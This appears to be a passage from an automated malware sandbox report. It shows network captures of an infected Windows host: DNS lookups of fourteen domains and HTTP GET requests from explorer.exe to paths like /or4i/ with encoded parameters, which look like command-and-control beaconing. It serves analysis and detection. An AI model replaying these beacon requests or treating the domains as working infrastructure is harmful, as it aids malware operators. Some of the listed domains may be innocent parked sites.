                                                                                  May 12, 2021 20:03:48.183000088 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.183528900 CEST4976680192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:03:48.225518942 CEST804976634.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:03:53.348578930 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.476600885 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.476844072 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.476977110 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.607042074 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.613686085 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.613758087 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:03:53.613966942 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.614051104 CEST4976780192.168.2.4209.222.96.146
                                                                                  May 12, 2021 20:03:53.742172956 CEST8049767209.222.96.146192.168.2.4
                                                                                  May 12, 2021 20:04:03.739383936 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:03.782073975 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:03.782262087 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:03.782355070 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:03.823199034 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026160002 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026191950 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026207924 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026223898 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026237011 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026252985 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026266098 CEST804976823.227.38.74192.168.2.4
                                                                                  May 12, 2021 20:04:04.026359081 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:04.026434898 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:04.026524067 CEST4976880192.168.2.423.227.38.74
                                                                                  May 12, 2021 20:04:09.114598989 CEST4977180192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:04:09.155478954 CEST804977134.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:04:09.155698061 CEST4977180192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:04:09.156018019 CEST4977180192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:04:09.196738005 CEST804977134.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:04:09.293071032 CEST804977134.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:04:09.293102980 CEST804977134.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:04:09.293312073 CEST4977180192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:04:09.293401003 CEST4977180192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:04:09.334300995 CEST804977134.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:04:14.375233889 CEST4977280192.168.2.464.190.62.111
                                                                                  May 12, 2021 20:04:14.421308994 CEST804977264.190.62.111192.168.2.4
                                                                                  May 12, 2021 20:04:14.421504021 CEST4977280192.168.2.464.190.62.111
                                                                                  May 12, 2021 20:04:14.421730995 CEST4977280192.168.2.464.190.62.111
                                                                                  May 12, 2021 20:04:14.469587088 CEST804977264.190.62.111192.168.2.4
                                                                                  May 12, 2021 20:04:14.499639034 CEST804977264.190.62.111192.168.2.4
                                                                                  May 12, 2021 20:04:14.499670982 CEST804977264.190.62.111192.168.2.4
                                                                                  May 12, 2021 20:04:14.499866962 CEST4977280192.168.2.464.190.62.111
                                                                                  May 12, 2021 20:04:14.499905109 CEST4977280192.168.2.464.190.62.111
                                                                                  May 12, 2021 20:04:14.545454979 CEST804977264.190.62.111192.168.2.4
                                                                                  May 12, 2021 20:04:19.891675949 CEST4977380192.168.2.4154.93.81.33
                                                                                  May 12, 2021 20:04:20.186930895 CEST8049773154.93.81.33192.168.2.4
                                                                                  May 12, 2021 20:04:20.187036991 CEST4977380192.168.2.4154.93.81.33
                                                                                  May 12, 2021 20:04:20.187233925 CEST4977380192.168.2.4154.93.81.33
                                                                                  May 12, 2021 20:04:20.482285023 CEST8049773154.93.81.33192.168.2.4
                                                                                  May 12, 2021 20:04:20.488903999 CEST8049773154.93.81.33192.168.2.4
                                                                                  May 12, 2021 20:04:20.489343882 CEST4977380192.168.2.4154.93.81.33
                                                                                  May 12, 2021 20:04:20.489372015 CEST4977380192.168.2.4154.93.81.33
                                                                                  May 12, 2021 20:04:20.784749985 CEST8049773154.93.81.33192.168.2.4
                                                                                  May 12, 2021 20:04:30.976696968 CEST4977580192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:04:31.017779112 CEST804977534.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:04:31.017920017 CEST4977580192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:04:31.017971039 CEST4977580192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:04:31.061065912 CEST804977534.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:04:31.157010078 CEST804977534.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:04:31.157037973 CEST804977534.102.136.180192.168.2.4
                                                                                  May 12, 2021 20:04:31.157445908 CEST4977580192.168.2.434.102.136.180
                                                                                  May 12, 2021 20:04:31.198508978 CEST804977534.102.136.180192.168.2.4

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  May 12, 2021 20:02:13.063652039 CEST5912353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:13.115976095 CEST53591238.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:13.950892925 CEST5453153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:14.001583099 CEST53545318.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:14.862333059 CEST4971453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:14.910777092 CEST53497148.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:16.253977060 CEST5802853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:16.312331915 CEST53580288.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:17.959619999 CEST5309753192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:18.018564939 CEST53530978.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:19.917366982 CEST4925753192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:19.968873978 CEST53492578.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:20.905808926 CEST6238953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:20.957370996 CEST53623898.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:22.008506060 CEST4991053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:22.060240030 CEST53499108.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:23.610280991 CEST5585453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:23.672235966 CEST53558548.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:24.907501936 CEST6454953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:24.959218979 CEST53645498.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:26.840797901 CEST6315353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:26.891748905 CEST53631538.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:27.852621078 CEST5299153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:27.901262045 CEST53529918.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:29.118077040 CEST5370053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:29.168251038 CEST53537008.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:30.055177927 CEST5172653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:30.112361908 CEST53517268.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:31.206779957 CEST5679453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:31.255425930 CEST53567948.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:48.330780983 CEST5653453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:48.398782969 CEST53565348.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:49.652365923 CEST5662753192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:49.701029062 CEST53566278.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:52.528722048 CEST5662153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:52.579396963 CEST53566218.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:53.465450048 CEST6311653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:53.517167091 CEST53631168.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:54.630578995 CEST6407853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:54.679369926 CEST53640788.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:56.183978081 CEST6480153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:56.233654976 CEST53648018.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:02:59.364567995 CEST6172153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:02:59.423401117 CEST53617218.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:08.425471067 CEST5125553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:08.482908010 CEST53512558.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:15.367290020 CEST6152253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:15.565867901 CEST53615228.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:17.725886106 CEST5233753192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:17.826119900 CEST53523378.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:18.362668991 CEST5504653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:18.554306984 CEST53550468.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:19.165740013 CEST4961253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:19.229396105 CEST53496128.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:19.479994059 CEST4928553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:19.545161009 CEST53492858.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:19.681936026 CEST5060153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:19.739070892 CEST53506018.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:20.341811895 CEST6087553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:20.403373003 CEST53608758.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:20.950119972 CEST5644853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:21.008697987 CEST53564488.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:21.196305990 CEST5917253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:21.256314039 CEST53591728.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:21.501291990 CEST6242053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:21.549973965 CEST53624208.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:22.291475058 CEST6057953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:22.351526022 CEST53605798.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:23.481899977 CEST5018353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:23.544143915 CEST53501838.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:23.963395119 CEST6153153192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:24.012821913 CEST53615318.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:26.447210073 CEST4922853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:26.510171890 CEST53492288.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:27.032042980 CEST5979453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:27.093102932 CEST53597948.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:31.948725939 CEST5591653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:32.012048960 CEST53559168.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:37.212663889 CEST5275253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:37.294027090 CEST53527528.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:42.467097044 CEST6054253192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:42.628508091 CEST53605428.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:47.937995911 CEST6068953192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:47.999537945 CEST53606898.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:03:53.199996948 CEST6420653192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:03:53.347131014 CEST53642068.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:03.668735027 CEST5090453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:03.738435030 CEST53509048.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:03.935262918 CEST5752553192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:04.003670931 CEST53575258.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:06.033979893 CEST5381453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:06.099162102 CEST53538148.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:09.047368050 CEST5341853192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:09.111213923 CEST53534188.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:14.310559034 CEST6283353192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:14.373636007 CEST53628338.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:19.542972088 CEST5926053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:19.890546083 CEST53592608.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:25.495456934 CEST4994453192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:25.639183998 CEST53499448.8.8.8192.168.2.4
                                                                                  May 12, 2021 20:04:30.903311968 CEST6330053192.168.2.48.8.8.8
                                                                                  May 12, 2021 20:04:30.975553036 CEST53633008.8.8.8192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  May 12, 2021 20:03:15.367290020 CEST192.168.2.48.8.8.80x9f67Standard query (0)www.healshameyoga.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:21.196305990 CEST192.168.2.48.8.8.80x5ceeStandard query (0)www.rogersbeefarm.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:26.447210073 CEST192.168.2.48.8.8.80x3912Standard query (0)www.nowhealthdays.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:31.948725939 CEST192.168.2.48.8.8.80xcf80Standard query (0)www.ikeberto.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:37.212663889 CEST192.168.2.48.8.8.80x7424Standard query (0)www.directflence.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.467097044 CEST192.168.2.48.8.8.80x78bStandard query (0)www.mmgenius.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:47.937995911 CEST192.168.2.48.8.8.80xce09Standard query (0)www.rainboxs.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:53.199996948 CEST192.168.2.48.8.8.80x776cStandard query (0)www.nobleandmarble.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:03.668735027 CEST192.168.2.48.8.8.80x987eStandard query (0)www.safegrinder.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:09.047368050 CEST192.168.2.48.8.8.80x5430Standard query (0)www.tecquestrian.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:14.310559034 CEST192.168.2.48.8.8.80x8005Standard query (0)www.booweats.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:19.542972088 CEST192.168.2.48.8.8.80x20bfStandard query (0)www.cuntrera.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:25.495456934 CEST192.168.2.48.8.8.80x111dStandard query (0)www.blissfulyogamullicahill.comA (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:30.903311968 CEST192.168.2.48.8.8.80x8610Standard query (0)www.changethecompany.netA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  May 12, 2021 20:03:15.565867901 CEST8.8.8.8192.168.2.40x9f67No error (0)www.healshameyoga.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:15.565867901 CEST8.8.8.8192.168.2.40x9f67No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:21.256314039 CEST8.8.8.8192.168.2.40x5ceeNo error (0)www.rogersbeefarm.comrogersbeefarm.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:21.256314039 CEST8.8.8.8192.168.2.40x5ceeNo error (0)rogersbeefarm.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:26.510171890 CEST8.8.8.8192.168.2.40x3912No error (0)www.nowhealthdays.comnowhealthdays.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:26.510171890 CEST8.8.8.8192.168.2.40x3912No error (0)nowhealthdays.com198.54.114.164A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:32.012048960 CEST8.8.8.8192.168.2.40xcf80No error (0)www.ikeberto.comikeberto.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:32.012048960 CEST8.8.8.8192.168.2.40xcf80No error (0)ikeberto.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:37.294027090 CEST8.8.8.8192.168.2.40x7424No error (0)www.directflence.comdirectflence.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:37.294027090 CEST8.8.8.8192.168.2.40x7424No error (0)directflence.com185.4.135.136A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.628508091 CEST8.8.8.8192.168.2.40x78bNo error (0)www.mmgenius.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.628508091 CEST8.8.8.8192.168.2.40x78bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.16.197.4A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.628508091 CEST8.8.8.8192.168.2.40x78bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com13.59.53.244A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:42.628508091 CEST8.8.8.8192.168.2.40x78bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:47.999537945 CEST8.8.8.8192.168.2.40xce09No error (0)www.rainboxs.comrainboxs.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:47.999537945 CEST8.8.8.8192.168.2.40xce09No error (0)rainboxs.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:03:53.347131014 CEST8.8.8.8192.168.2.40x776cNo error (0)www.nobleandmarble.comnobleandmarble.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:03:53.347131014 CEST8.8.8.8192.168.2.40x776cNo error (0)nobleandmarble.com209.222.96.146A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:03.738435030 CEST8.8.8.8192.168.2.40x987eNo error (0)www.safegrinder.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:04:03.738435030 CEST8.8.8.8192.168.2.40x987eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:09.111213923 CEST8.8.8.8192.168.2.40x5430No error (0)www.tecquestrian.comtecquestrian.comCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:04:09.111213923 CEST8.8.8.8192.168.2.40x5430No error (0)tecquestrian.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:14.373636007 CEST8.8.8.8192.168.2.40x8005No error (0)www.booweats.com64.190.62.111A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:19.890546083 CEST8.8.8.8192.168.2.40x20bfNo error (0)www.cuntrera.com154.93.81.33A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:25.639183998 CEST8.8.8.8192.168.2.40x111dNo error (0)www.blissfulyogamullicahill.com199.59.242.153A (IP address)IN (0x0001)
                                                                                  May 12, 2021 20:04:30.975553036 CEST8.8.8.8192.168.2.40x8610No error (0)www.changethecompany.netchangethecompany.netCNAME (Canonical name)IN (0x0001)
                                                                                  May 12, 2021 20:04:30.975553036 CEST8.8.8.8192.168.2.40x8610No error (0)changethecompany.net34.102.136.180A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.healshameyoga.com
                                                                                  • www.rogersbeefarm.com
                                                                                  • www.nowhealthdays.com
                                                                                  • www.ikeberto.com
                                                                                  • www.directflence.com
                                                                                  • www.mmgenius.com
                                                                                  • www.rainboxs.com
                                                                                  • www.nobleandmarble.com
                                                                                  • www.safegrinder.com
                                                                                  • www.tecquestrian.com
                                                                                  • www.booweats.com
                                                                                  • www.cuntrera.com
                                                                                  • www.changethecompany.net

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.44974444.227.76.16680C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:15.982130051 CEST1284OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1
                                                                                  Host: www.healshameyoga.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:16.190001965 CEST1285INHTTP/1.1 307 Temporary Redirect
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:16 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 168
                                                                                  Connection: close
                                                                                  Location: http://healshameyoga.com
                                                                                  X-Frame-Options: sameorigin
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.44975234.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:21.298877954 CEST1643OUTGET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.rogersbeefarm.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:21.436414003 CEST1673INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:03:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "6096ba97-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  10192.168.2.44977264.190.62.11180C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:14.421730995 CEST6051OUTGET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
                                                                                  Host: www.booweats.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:04:14.499639034 CEST6052INHTTP/1.1 302 Found
                                                                                  date: Wed, 12 May 2021 18:04:14 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  content-length: 0
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_GR7H1xMTDQhvKsk9JLsRBf15xjVzhUxhlhUt6qvgKB5IoHIpJ3jjYusyTMFbvzyGzakXql8yj22nmafDt8NgEQ==
                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  pragma: no-cache
                                                                                  last-modified: Wed, 12 May 2021 18:04:14 GMT
                                                                                  location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                                  x-cache-miss-from: parking-5cc4cbb56f-5qv64
                                                                                  server: NginX
                                                                                  connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  11192.168.2.449773154.93.81.3380C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:20.187233925 CEST6053OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1
                                                                                  Host: www.cuntrera.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  12192.168.2.44977534.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:31.017971039 CEST6060OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1
                                                                                  Host: www.changethecompany.net
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
